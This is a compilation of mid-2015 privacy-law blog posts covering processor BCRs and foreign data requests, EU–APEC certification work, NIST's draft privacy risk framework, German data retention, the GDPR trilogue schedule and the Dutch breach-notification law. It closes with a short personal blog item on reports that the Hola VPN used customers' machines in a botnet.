  • Requests from non-EU regulators or government agencies – If a non-EU processor receives a legally binding request for personal data from a non-EU regulator or government agency, the non-EU processor should notify a slightly different set of parties. In that event, the non-EU controller should notify:
    • the controller;
    • the DPA in the controller’s EU Member State; and
    • the lead DPA that approved the processor group’s BCRs.

The Working Party’s updated version of WP204 does not amend the requirements set out above. Rather the updated version provides additional guidance, including:

  • The BCRs should require the non-EU processor to assess each request for personal data on a case-by-case basis and put each request “on hold” for a reasonable period of time, in order to notify the competent DPAs. The notification to the DPAs must explain the legal grounds on which disclosure is requested.
  • The competent DPAs must endeavor to respond to notifications from the non-EU processor within a reasonable timeframe, and may decide whether to suspend or prohibit further transfers of personal data to the non-EU processor under the BCRs. Alternatively, those DPAs may decide to authorize disclosures of the type made by the non-EU processor.
  • If the laws under which the relevant request is made prohibit the non-EU processor from notifying the parties listed above, the non-EU processor must use “best efforts” to waive that prohibition, and must be able to demonstrate that it did so.
  • Where the non-EU processor cannot notify the competent DPAs of a disclosure, it must provide the DPAs with general information (such as the number of requests received in a year, the types of data requested, and the types of requesters, where possible).
  • The Working Party states that disclosures of personal data by a non-EU processor to a local public authority cannot be “massive, disproportionate and indiscriminate in a manner that…would go beyond what is necessary in a democratic society.” This is consistent with existing EU data protection concepts, but non-EU processors may find these standards difficult to satisfy under the laws of their respective jurisdictions.
  • The Working Party recommends that “international or intergovernmental agreements should be put in place to provide adequate data protection guarantees to EU data.”

Although the Working Party’s guidance provides helpful clarification, there remains a number of unresolved questions. In particular, there is a risk that non-EU processors will send frequent and overly-broad notifications to DPAs (even where a possible future disclosure requirement is entirely hypothetical) in order to comply with the Working Party’s guidance. It is unclear how DPAs will respond if they are inundated with notifications concerning hypothetical disclosure obligations.

BCRs for processors remain an evolving area of EU data protection law, and it is likely that we will see further guidance on these issues from DPAs and the Working Party as increasing numbers of processors begin to use BCRs.

Article 29 Working Party and APEC Agree on Work Plan to Simplify Dual Certification under APEC CBPRs and EU BCRs

On May 29, 2015, Article 29 Working Party Chairwoman Isabelle Falque-Pierrotin sent a letter to APEC Data Privacy Subgroup (“DPS”) Chair Danièle Chatelois, expressing the Working Party’s continued support for the collaboration between the two groups.

In March 2014, the two groups released a joint “Referential” that maps the respective requirements of the APEC Cross-Border Privacy Rules (“CBPR”) system and EU Binding Corporate Rules (“BCRs”). In her letter, Falque-Pierrotin characterized their collaboration to date as “fruitful” and expressed the Working Party’s continued support for further collaboration “to develop practical tools that will help organizations implement both requirements from the CBPR and BCR systems.”

Referring to the joint Working Party-DPS action plan adopted at the Working Party’s 100th plenary meeting on April 14-15 in Brussels (view the press release from April 15), the letter sets forth the following agreed action items for the BCRs-CBPRs working team:

In the short term:

  • Develop a common CBPRs/BCRs application form that organizations seeking dual certification can submit to European data protection authorities and APEC Accountability Agents.
  • Develop compliance mapping tools with respect to the CBPRs and BCRs that must be submitted along with the application.

In the long term:

  • Develop a mapping document comparing the respective requirements of the BCRs for processors and the APEC Privacy Recognition for Processors.

The three action items were based on recommendations developed during the BCR-DPS working team meeting in the margins of the last round of APEC privacy meetings earlier this year in Subic Bay, Philippines, and a subsequent consultation with businesses experienced in seeking dual certification under both systems.

NIST Publishes Draft Report on Privacy Risk Management for Federal Information Systems

On June 2, 2015, the National Institute of Standards and Technology (“NIST”) issued a press release on its recently published draft report, entitled Privacy Risk Management Framework for Federal Information Systems (the “Report”). The Report describes a privacy risk management framework (“PRMF”) for federal information systems designed to promote “a greater understanding of privacy impacts and the capability to address them in federal information systems through risk management.” The draft PRMF includes a Privacy Risk Assessment Methodology (“PRAM”) consisting of several worksheets for assessing the privacy impact of data actions.

Key elements and objectives of the PRMF include:

  • A common vocabulary concerning privacy risks and the implementation of privacy principles.
  • A means for bridging the gap between high-level principles and practical implementation of privacy protections.
  • Three privacy engineering objectives – predictability, manageability and disassociability – that enable effective privacy risk management systems.
  • A methodology that enables agencies to identify and quantify privacy risks.
  • A methodology that “yield[s] repeatable and measurable” results and allows agencies to prioritize and allocate resources to achieve their missions while also minimizing any adverse impacts on individuals and themselves.

NIST has requested that comments on the Report be submitted by July 13. The comments form can be found on the NIST website and can be submitted to privacyeng@nist.gov. NIST has indicated that its future work in the area of privacy risk management will focus on the controls to mitigate the risks identified in the PRMF.

Germany Adopts a Draft Telecom Data Retention Law that Includes a Localization Requirement

On May 28, 2015, the German government adopted a draft law that would require telecommunications and Internet service providers to retain Internet and telephone usage data. The initiative comes more than a year after the European Court of Justice declared the EU Data Retention Directive invalid, which had been implemented previously by German law. The German law implementing the EU Data Protection Directive had been declared unconstitutional by the German Federal Constitutional Court five years ago.

Retention Periods

Under the draft law, telecommunications and Internet service providers would have to retain various Internet and telephone usage data, including phone numbers, times called, IP addresses, and the international identifiers of mobile users (if applicable) for both the calling and called port for a period of 10 weeks. Furthermore, user location data in the context of mobile phone services would have to be retained for a period of four weeks. The draft law also requires the data to be deleted without undue delay after the expiration of the relevant retention period, and in any event, within one week following the expiration of the retention period.

Security and Localization Requirements

Telecommunications and Internet service providers also would be required to ensure that (1) data is stored in accordance with the highest possible levels of security, (2) data is stored within Germany, and (3) measures are in place to protect data from unauthorized inspection and use.

Administrative Offense and Fines

Non-compliance with the data retention requirements would constitute an administrative offense that would be punishable by a maximum fine of 500,000 EUR.

The draft law must be approved by Parliament before becoming law. The law has generated significant criticism by leading telecommunications industry associations.

EU General Data Protection Regulation: Timetable for Trilogue Discussions

On June 1, 2015, the Group of the European People’s Party in the European Parliament released an updated timetable for agreeing on the proposed EU General Data Protection Regulation (the “Regulation”). The European Commission, European Parliament and the Council of the European Union will soon enter multilateral negotiations, known as the “trilogue,” to agree on the final text of the proposed Regulation.

The trilogue will commence once the Council of the European Union, acting through the Justice and Home Affairs Council (the “Council”), has agreed on its common position, which is expected to be finalized imminently, and formally adopted by the Council at its next meeting on June 15, 2015, in Luxembourg. The first trilogue negotiations are expected to take place shortly after June 24, 2015. The European Parliament also will publish a general roadmap for further trilogue meetings later in 2015, but exact dates have not yet been finalized and are subject to agreement with the European Commission and Council of Ministers.

The key dates are as follows:

  • June 15, 2015 – Justice and Home Affairs Ministers Council meeting in Luxembourg, where it is assumed a general approach to the Regulation will be adopted.
  • June 24, 2015 – First trilogue meeting to be held in Brussels (subject to agreement with the European Commission and the Council) to agree on the overall roadmap for trilogue negotiations.
  • July 14, 2015 – Second trilogue meeting to discuss territorial scope and international transfers.
  • September 2015 – Further trilogue meetings to debate data protection principles, the rights of data subjects and the obligations of controllers and processors.
  • October 2015 – Trilogue discussions will focus on Data Protection Authorities, cooperation and consistency, and remedies, liability and sanctions.
  • November 2015 – Further trilogue meetings to deliberate (1) the objectives and material scope of the Regulation, (2) flexibility for the public sector and (3) specific data processing regimes.
  • December 2015 – The last trilogue meetings of the year will focus on delegated and implementing acts, final provisions and any other remaining issues.

In addition, the incoming Luxembourg Council Presidency is aiming to agree on a general approach to the Police and Criminal Justice Data Protection Directive, the second element of the EU data protection reform package, in October or November of this year. A trilogue would start immediately afterward and run in parallel with the trilogue on the Regulation.

Hunton’s Privacy Practice Receives Global Tier 1 Ranking by Chambers

Hunton & Williams LLP announces the firm’s Global Privacy and Cybersecurity practice was again ranked in Tier 1 by Chambers & Partners in their 2015 Global and USA guides. Over the last eight years, the firm has been recognized by Chambers Global, Chambers UK and Chambers USA as a Tier 1 firm for privacy and data protection. As noted by Chambers USA, the practice lawyers “have established themselves as real leaders in this area.”

Lisa Sotto, head of the firm’s global privacy and cybersecurity practice and managing partner of the New York office, received the top honor of “Star” individual for privacy and data security by Chambers USA, and she was recently named to The National Law Journal’s Outstanding Women Lawyers list, the latest recognition of Sotto’s career and reputation as one of the world’s leading practitioners in privacy and cybersecurity law. The head of the firm’s UK privacy and cybersecurity practice Bridget Treacy and senior attorney Rosemary Jay also received the honor of “Star” individuals for data protection by Chambers UK. Brussels office managing partner, Wim Nauwelaerts, is recognized as a leading privacy practitioner by Chambers Global, Chambers Europe, The Legal 500 (Belgium) and Global Law Experts.

The practice focuses on all aspects of privacy, cybersecurity and information governance issues for multinational companies across a broad range of industry sectors. Computerworld magazine recognized Hunton & Williams as the best global privacy advisor for each of its four surveys, stating that “Hunton & Williams stood head and shoulders above the rest.” Hunton & Williams also was selected for one Fortune 100 client’s 2013 Law Firm Award for its privacy work, noting that the privacy team’s “laser focus on the issues resulted in a flawless execution.”

The firm’s privacy practice has extensive experience organizing, managing and coordinating compliance projects with both national and international dimensions. Together with the firm’s Centre for Information Policy Leadership, lawyers in the practice develop innovative, pragmatic approaches to privacy and data security policy that take into account business imperatives and address the concerns of individuals regarding the protection of their information.

New Dutch Law Introduces General Data Breach Notification Obligation and Higher Sanctions

On May 26, 2015, the Upper House of the Dutch Parliament passed a bill that introduces a general obligation for data controllers to notify the Dutch Data Protection Authority (“DPA”) of data security breaches and provides increased sanctions for violations of the Dutch Data Protection Act. A Dutch Royal Decree still needs to be adopted to set the new law’s date of entry into force. According to the Dutch DPA, the new law is likely to come into force on January 1, 2016.

Currently, Dutch law includes data breach notification obligations for specific sectors in the Netherlands (e.g., the financial and healthcare sectors) or particular types of organizations (e.g., telecommunications and Internet service providers). The new law will extend that obligation to all data controllers subject to the Dutch Data Protection Act. In this respect, the new Dutch law anticipates the proposed EU General Data Protection Regulation, which will introduce such an obligation across the EU but not before 2017-2018.

Under the new Dutch law, data controllers will be required to notify immediately the Dutch DPA of any data security breaches that have or are likely to have serious adverse consequences for the protection of personal data. The DPA will likely issue practical guidance at a later stage to clarify the circumstances under which notification to the DPA is required. In addition, as a result of the new law, telecommunications and Internet service providers will be required to provide notification of data security breaches to the Dutch DPA (and no longer to the Dutch Authority for Consumers & Markets, which will be replaced by the Dutch DPA). Under the new law, notifications to the DPA should include at least the following information:

  • the nature of the breach;
  • the entities or bodies that can provide further information on the breach;
  • the expected consequences of the breach for the data processing;
  • the recommended measures to mitigate the adverse consequences of the breach; and
  • the measures taken to deal with the breach.

In addition to notifying the DPA, data controllers will be required to notify affected individuals if there is a reason to believe that the breach could lead to adverse consequences for them, unless the compromised data is encrypted or otherwise unintelligible to third parties. Data controllers also will have to maintain an internal data breach register recording all data security breaches they experience that might affect individuals.

Failure to provide notification of data security breaches will be subject to a fine of up to € 810,000 or 10% of the organization’s annual net turnover. The new Law also will empower the DPA to impose higher fines for other violations of the Dutch Data Protection Act. The amount of administrative fines will be increased to:

  • € 20,250 for violations already subject to a fine (e.g., failure for non-EU data controllers to appoint a local representative when using means of data processing in the Netherlands or failure to comply with cross-border data transfer restrictions), and
  • a maximum of € 810,000 or 10 % of the organization’s annual net turnover for other violations of the Dutch Data Protection Act.

It’s no Fun Being Right All the Time

Last week, I finally got around to writing about HideMyAss, and doing a spot of speculation about how other proxy anonymizers earn their coin. Almost immediately I hit "publish" I spotted this article pop up on Zdnet. Apparently/allegedly, Hola subsidise their income by turning your machine into a part-time member of a botnet.
Normally, I really enjoy being proved right - ask my long suffering colleagues. In this case though, I'd rather the news wasn't quite so worrying. A bit of advertising, click hijacking and so forth is liveable. Malware? You can get rid... but a botnet client means you might be part of something illegal, and you'd never know the difference.